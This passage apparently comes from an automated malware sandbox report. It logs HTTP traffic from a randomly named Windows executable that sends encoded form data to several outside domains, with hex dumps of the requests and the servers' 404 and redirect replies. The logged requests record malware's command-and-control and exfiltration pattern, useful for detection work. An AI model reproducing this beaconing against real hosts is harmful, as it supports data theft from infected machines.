                                                                                                                              Data Ascii: ej6Le=6pkncK1UsB48Mio+Tm6mv9QJQX4ihq4MogIF9xqM/RpQO0cemhpd7+s06ejNiC5annnpW1EUoNUXTsWgRrEPUgdC2PSY4JxyjKC4VaSVejCg8YpZJ+ZTnG2OSF6IlXDYsdRYl+hGqLQ7rCHu4bM0hG7DdcRBP/QJGTCZHcA+21aUi0KS9AZY6yHSNaVjIUhkhgCUm8H+AA+JMruI/y0CFIOUCzPOEbs0bzrkwe0SYlDgT663s2ssyXJGxzYKjg3uuOSMJlOja53o0J61VSz1C/uSr2v4e++gy3Ntq9+6vKPMcGXyHnasMTb1qHqFKFHaaAoAuBSBPcLtEDqjBMCUZedgbLInN3ylsdhtNPZlgdz1vWENZJnNgfO/15nXBV/mY3a2dItlqx0UVPnWCShRhOQ+3ZR13u3imcGWvnUZ8PzgoAasfWe1CXfrc3bXZBs5ftjhqkNGoDMlVauBOSgSP1KZZe3ONVu+Wg+m+SN6N6Bevwkzgv4tkCG7AMofurcLIopBlWbHC6G69zGkfZKaxqffkh6H+txnMu9jIhcgiznvQI9FJZPeoaHotfqMVFW+zhhNnP1VfQDmDCwUVBwUmiAFT1lTt0tDbGJ+SGJ54mBph5O7tB+0V0NdngmMJJdT+24ADi+4D2imZ22MINB6U5Pl2G8oZpO191fv679NF5fcj63vBFORXQkOPtvaKyYEk87TJmDsmOOtBWs7az0QdBPvRp5bQy87kIlqNR2jOPBbiFPu9oPPFatgEEwrYcQ8aobbK39pbZlO5RjrMk9ZHsBD9fftmuMZbHn+DWznmi4iyC0Cb7VYpM4yq3SqAB3AJD7lZplVJjZUgYhXQVNMD/sNRFQ44uqm7KeDZeshur8pmRLuHEd4SM0vf0DVHVX94SNFCfvtGNVNC2V29uWConmG3ddzucSOsPMLa9E4McyqqAEaExXV5A/ArGh9ChoLGuUoQ5SR5kJWcjTRMtu3vV0wQgaVk0kI3ppqgxJXVACSHm [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:35:40.914504051 CEST479INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:40 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 315
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              36192.168.2.65003068.178.233.113801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:42.555382013 CEST501OUTGET /m1w5/?ej6Le=3rMHf/BSjWsGYHwCFDyQr7UpHD469M8Ow0JV4TmI6XMWIkQCx3J07rEG1KeFsj1Bt3GmHG0JhP0iSMuoC4YaBVBwifK18YsKoqHqcY+PGErO86AoCrs033ftT3/LwHGHiZtPsOM=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.kk88.live
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:35:43.466133118 CEST479INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:43 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 315
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              37192.168.2.6500313.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:48.519418001 CEST778OUTPOST /g5rn/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.cablecarrental.net
                                                                                                                              Origin: http://www.cablecarrental.net
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.cablecarrental.net/g5rn/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 74 35 44 63 61 6c 6d 62 59 56 52 54 33 4b 73 56 71 5a 32 74 77 42 6d 61 51 6d 50 68 39 33 76 72 56 31 50 4f 68 79 50 53 6b 46 36 58 75 63 66 63 72 48 7a 42 31 63 42 54 78 2b 67 6d 6e 76 45 66 6b 66 72 48 72 75 6f 2b 74 41 31 2f 4c 75 67 6f 38 69 2f 51 56 7a 47 4f 32 66 65 2b 48 50 63 6d 32 71 69 53 55 68 57 4b 4f 57 42 6c 67 4a 58 71 61 51 4f 56 45 47 79 63 47 33 6c 4e 4b 56 62 47 6a 57 4d 6a 6c 39 57 36 49 62 68 52 48 62 75 46 47 78 4c 44 45 41 6b 54 73 68 72 6b 42 37 66 73 61 2b 61 77 4b 66 68 62 38 78 45 52 52 4b 45 42 45 55 42 64 68 55 62 55 6b 67 35 4d 5a 48 46 6a 4e 67 38 63 4e 54 72 6f 34 70 58 38
                                                                                                                              Data Ascii: ej6Le=t5DcalmbYVRT3KsVqZ2twBmaQmPh93vrV1POhyPSkF6XucfcrHzB1cBTx+gmnvEfkfrHruo+tA1/Lugo8i/QVzGO2fe+HPcm2qiSUhWKOWBlgJXqaQOVEGycG3lNKVbGjWMjl9W6IbhRHbuFGxLDEAkTshrkB7fsa+awKfhb8xERRKEBEUBdhUbUkg5MZHFjNg8cNTro4pX8


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              38192.168.2.6500323.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:51.058733940 CEST802OUTPOST /g5rn/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.cablecarrental.net
                                                                                                                              Origin: http://www.cablecarrental.net
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.cablecarrental.net/g5rn/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 74 35 44 63 61 6c 6d 62 59 56 52 54 6c 62 63 56 70 36 4f 74 68 78 6d 5a 56 6d 50 68 30 58 75 69 56 31 7a 4f 68 7a 37 43 6b 32 4f 58 75 34 58 63 71 47 7a 42 37 38 42 54 70 75 67 6e 70 50 45 51 6b 66 6d 36 72 72 49 2b 74 41 4a 2f 4c 72 63 6f 38 52 6e 54 58 6a 47 62 2b 2f 65 34 59 66 63 6d 32 71 69 53 55 68 53 6b 4f 57 35 6c 6e 35 6e 71 5a 31 36 57 48 47 79 64 50 58 6c 4e 4f 56 61 4e 6a 57 4d 52 6c 38 36 63 49 59 56 52 48 66 71 46 47 67 4c 4d 54 51 6b 56 68 42 71 4e 4e 65 75 49 58 4f 62 73 46 63 38 2b 74 51 67 61 5a 63 46 62 59 6e 42 2b 7a 45 37 57 6b 69 68 2b 5a 6e 46 4a 50 67 45 63 66 45 6e 50 33 64 79 66 53 55 31 6c 32 51 67 33 64 36 52 4a 30 74 6b 73 45 30 66 6a 35 67 3d 3d
                                                                                                                              Data Ascii: ej6Le=t5DcalmbYVRTlbcVp6OthxmZVmPh0XuiV1zOhz7Ck2OXu4XcqGzB78BTpugnpPEQkfm6rrI+tAJ/Lrco8RnTXjGb+/e4Yfcm2qiSUhSkOW5ln5nqZ16WHGydPXlNOVaNjWMRl86cIYVRHfqFGgLMTQkVhBqNNeuIXObsFc8+tQgaZcFbYnB+zE7Wkih+ZnFJPgEcfEnP3dyfSU1l2Qg3d6RJ0tksE0fj5g==


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              39192.168.2.6500333.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:53.605835915 CEST1815OUTPOST /g5rn/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.cablecarrental.net
                                                                                                                              Origin: http://www.cablecarrental.net
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.cablecarrental.net/g5rn/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 74 35 44 63 61 6c 6d 62 59 56 52 54 6c 62 63 56 70 36 4f 74 68 78 6d 5a 56 6d 50 68 30 58 75 69 56 31 7a 4f 68 7a 37 43 6b 32 57 58 75 71 50 63 72 6c 62 42 36 38 42 54 33 2b 67 71 70 50 45 4a 6b 63 57 2b 72 72 4d 45 74 47 46 2f 4b 4e 49 6f 34 55 4c 54 64 6a 47 62 79 66 65 35 48 50 63 2f 32 72 4f 57 55 68 69 6b 4f 57 35 6c 6e 2f 72 71 50 51 4f 57 4c 6d 79 63 47 33 6b 4d 4b 56 61 6c 6a 57 31 6d 6c 38 2b 71 4c 75 6c 52 48 2f 36 46 48 57 58 4d 51 77 6b 58 6d 42 71 56 4e 65 71 58 58 4f 48 67 46 66 68 62 74 52 59 61 61 4c 68 46 63 30 4e 67 6c 69 6a 7a 39 78 70 38 66 53 74 6c 4f 42 73 6e 59 55 62 6d 77 38 79 4f 58 77 78 75 69 78 64 73 4b 5a 31 6b 30 37 5a 48 50 57 57 53 68 6a 48 30 52 34 52 79 45 73 41 56 39 53 43 4f 57 58 5a 72 4a 53 69 6a 6f 68 4c 4a 4e 57 4c 6c 56 2b 44 5a 76 43 57 34 73 68 36 68 52 6a 65 37 68 48 39 43 62 51 4f 4e 6d 59 73 32 53 6d 70 31 44 77 5a 30 39 73 4a 6a 74 45 66 76 64 4d 6d 4b 49 78 35 63 44 4a 4e 72 37 38 53 33 74 54 37 6f 37 35 62 74 43 70 59 2b 7a 36 52 6b [TRUNCATED]
                                                                                                                              Data Ascii: ej6Le=t5DcalmbYVRTlbcVp6OthxmZVmPh0XuiV1zOhz7Ck2WXuqPcrlbB68BT3+gqpPEJkcW+rrMEtGF/KNIo4ULTdjGbyfe5HPc/2rOWUhikOW5ln/rqPQOWLmycG3kMKValjW1ml8+qLulRH/6FHWXMQwkXmBqVNeqXXOHgFfhbtRYaaLhFc0Nglijz9xp8fStlOBsnYUbmw8yOXwxuixdsKZ1k07ZHPWWShjH0R4RyEsAV9SCOWXZrJSijohLJNWLlV+DZvCW4sh6hRje7hH9CbQONmYs2Smp1DwZ09sJjtEfvdMmKIx5cDJNr78S3tT7o75btCpY+z6RkWUQKFggrNdVJ7vSpq3gJ7kyY9SLKu/a679V1lszAZvK26KVObXg86QApJ243KHtFrv5zQ4WziAhzvBS1cX20CvnGDQfOT3q5IH6v/r71DsC4Vy4uvh8q+rI1zp6kTNqIfEXb7L7nPHzBgMmZo9xx7XQjuPB9ZijLf865OUEc1bY4UjyxN6jogmF8Vh73EpR2mOG400DVNOmhibqK1cQ99Byk4F9YMSIb8gtkjUmRi1nneHLiABMDcZQXtRBcADBIsTRIsp5iPM10baRPS1enbxr46jpnu/JyW9yjyPJ5vIZDTc5rzSXoikyPwXez8AhmBqJC3NcBO83Rdawsz776igXmTWoHCpaGIb7WAPoytwhDJTJLPRq9+jwv4umZWclFGpLjly4scMTwuI+Z2BKX6YNnhSN5g8pPjRij/hEPy6FN6ks+mN768wrOf23Efu75Ky4a3cX5QwpRDYhKlL9mh7wj8a/TK1xs1865Ewpq5O3K3Y8KHhor7/IoXllNfkUIOkvAetdrJVeBeMHnc4frmNrRUeWQGfcuAkQ1IQBMq9N8lCWIpTa6qut9WrenMvlMiaNZDkyeNc/HiG32crKO8rptDu2pHm7hflzNr/rmJ/5Vp2LYvzk80lsjqjZHBGObOuoI8vJyRQaTuqA5C8R8buqpc99GF4oe8u [TRUNCATED]


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              40192.168.2.6500343.33.130.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:56.154337883 CEST510OUTGET /g5rn/?ej6Le=g7r8ZVC0cxJrkvwRypX7ol6hCzLGk0q5Jh6A3BrwknfWwIjVhyX9x4N34a97pOgSsNGPocoejkJQBdcVqC7tK2vQwMKTMeAj0+OVYz2VfmsetKnlMlSnUnOZTT0AV1eZjywajZ8=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.cablecarrental.net
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:35:56.622138023 CEST413INHTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:56 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 273
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 6a 36 4c 65 3d 67 37 72 38 5a 56 43 30 63 78 4a 72 6b 76 77 52 79 70 58 37 6f 6c 36 68 43 7a 4c 47 6b 30 71 35 4a 68 36 41 33 42 72 77 6b 6e 66 57 77 49 6a 56 68 79 58 39 78 34 4e 33 34 61 39 37 70 4f 67 53 73 4e 47 50 6f 63 6f 65 6a 6b 4a 51 42 64 63 56 71 43 37 74 4b 32 76 51 77 4d 4b 54 4d 65 41 6a 30 2b 4f 56 59 7a 32 56 66 6d 73 65 74 4b 6e 6c 4d 6c 53 6e 55 6e 4f 5a 54 54 30 41 56 31 65 5a 6a 79 77 61 6a 5a 38 3d 26 41 6e 3d 6d 4c 64 78 6f 32 59 38 52 4c 52 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ej6Le=g7r8ZVC0cxJrkvwRypX7ol6hCzLGk0q5Jh6A3BrwknfWwIjVhyX9x4N34a97pOgSsNGPocoejkJQBdcVqC7tK2vQwMKTMeAj0+OVYz2VfmsetKnlMlSnUnOZTT0AV1eZjywajZ8=&An=mLdxo2Y8RLRh"}</script></head></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              41192.168.2.65003538.55.251.233801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:36:10.166371107 CEST772OUTPOST /9wb2/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.kuaimaolife.shop
                                                                                                                              Origin: http://www.kuaimaolife.shop
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.kuaimaolife.shop/9wb2/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 30 57 4e 6b 4d 41 59 62 53 49 75 56 58 34 6f 68 39 6a 41 74 36 62 64 45 6b 2f 43 75 39 43 4b 6c 47 42 67 59 42 2b 32 6f 4a 38 70 5a 4c 6b 6f 52 46 73 6c 63 66 50 63 33 35 73 71 43 4c 7a 47 61 56 63 35 43 42 55 59 46 4a 30 5a 77 61 47 36 64 75 4c 4f 38 49 6f 57 71 39 51 33 74 4f 59 6e 49 72 4f 73 34 7a 71 30 6d 71 6f 57 2b 43 47 43 32 33 2b 44 4d 54 6d 48 6d 2f 4d 47 58 58 50 4a 75 63 71 39 44 31 36 45 79 66 76 72 46 4a 46 65 72 33 6f 42 4f 56 70 37 4e 63 78 2b 37 55 36 41 71 6e 7a 2f 4c 79 4d 4a 75 53 79 54 53 74 48 36 2b 37 56 46 57 46 46 70 78 32 34 30 58 56 58 53 34 59 52 57 34 51 30 66 43 4a 4d 6b 70
                                                                                                                              Data Ascii: ej6Le=0WNkMAYbSIuVX4oh9jAt6bdEk/Cu9CKlGBgYB+2oJ8pZLkoRFslcfPc35sqCLzGaVc5CBUYFJ0ZwaG6duLO8IoWq9Q3tOYnIrOs4zq0mqoW+CGC23+DMTmHm/MGXXPJucq9D16EyfvrFJFer3oBOVp7Ncx+7U6Aqnz/LyMJuSyTStH6+7VFWFFpx240XVXS4YRW4Q0fCJMkp
                                                                                                                              Oct 7, 2024 12:36:11.020119905 CEST691INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:36:10 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 548
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              42192.168.2.65003638.55.251.233801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:36:12.705909967 CEST796OUTPOST /9wb2/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.kuaimaolife.shop
                                                                                                                              Origin: http://www.kuaimaolife.shop
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.kuaimaolife.shop/9wb2/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 30 57 4e 6b 4d 41 59 62 53 49 75 56 58 59 59 68 78 69 41 74 74 72 64 46 68 2f 43 75 33 69 4c 73 47 42 6b 59 42 37 48 74 4b 4f 39 5a 4c 46 59 52 45 74 6c 63 50 66 63 33 72 4d 71 48 50 7a 47 52 56 63 45 39 42 56 55 46 4a 30 4e 77 61 47 4b 64 74 38 36 2f 4f 34 57 6f 79 77 33 6a 52 6f 6e 49 72 4f 73 34 7a 71 67 4d 71 6f 65 2b 43 7a 4b 32 78 62 76 44 61 47 48 35 2b 4d 47 58 54 50 4a 71 63 71 38 55 31 2f 74 6c 66 74 6a 46 4a 46 75 72 33 38 74 4e 47 4a 37 4c 43 42 2b 76 66 2b 59 6a 6e 56 6a 49 79 76 35 68 53 52 50 48 73 78 37 6b 6e 6d 46 31 58 56 4a 7a 32 36 73 6c 56 33 53 53 61 52 75 34 43 6a 54 6c 47 34 42 4b 38 61 52 34 77 7a 68 74 74 64 6d 65 61 50 49 2b 4b 4e 4f 2f 56 77 3d 3d
                                                                                                                              Data Ascii: ej6Le=0WNkMAYbSIuVXYYhxiAttrdFh/Cu3iLsGBkYB7HtKO9ZLFYREtlcPfc3rMqHPzGRVcE9BVUFJ0NwaGKdt86/O4Woyw3jRonIrOs4zqgMqoe+CzK2xbvDaGH5+MGXTPJqcq8U1/tlftjFJFur38tNGJ7LCB+vf+YjnVjIyv5hSRPHsx7knmF1XVJz26slV3SSaRu4CjTlG4BK8aR4wzhttdmeaPI+KNO/Vw==
                                                                                                                              Oct 7, 2024 12:36:13.566414118 CEST691INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 07 Oct 2024 10:36:13 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 548
                                                                                                                              Connection: close
